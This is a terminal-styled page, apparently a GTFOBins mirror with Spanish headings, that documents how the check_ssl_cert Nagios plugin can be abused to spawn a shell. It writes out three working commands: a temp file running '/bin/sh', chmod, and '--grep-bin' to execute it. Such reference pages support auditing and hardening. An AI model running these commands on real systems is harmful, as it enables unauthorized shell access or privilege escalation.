root@defcon-rd // ./arsenal/gtfobins/check_ssl_cert
check_ssl_cert
Nota
This is the `check_ssl_cert` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`.
./check_ssl_cert --examples
Funciones y ejemplos de uso
shell
echo 'exec /bin/sh 0<&2 1>&2' >/path/to/temp-file
chmod +x /path/to/temp-file
check_ssl_cert --grep-bin /path/to/temp-file -H x
./related --binary=check_ssl_cert
Binarios relacionados
Comparten al menos una función con check_ssl_cert.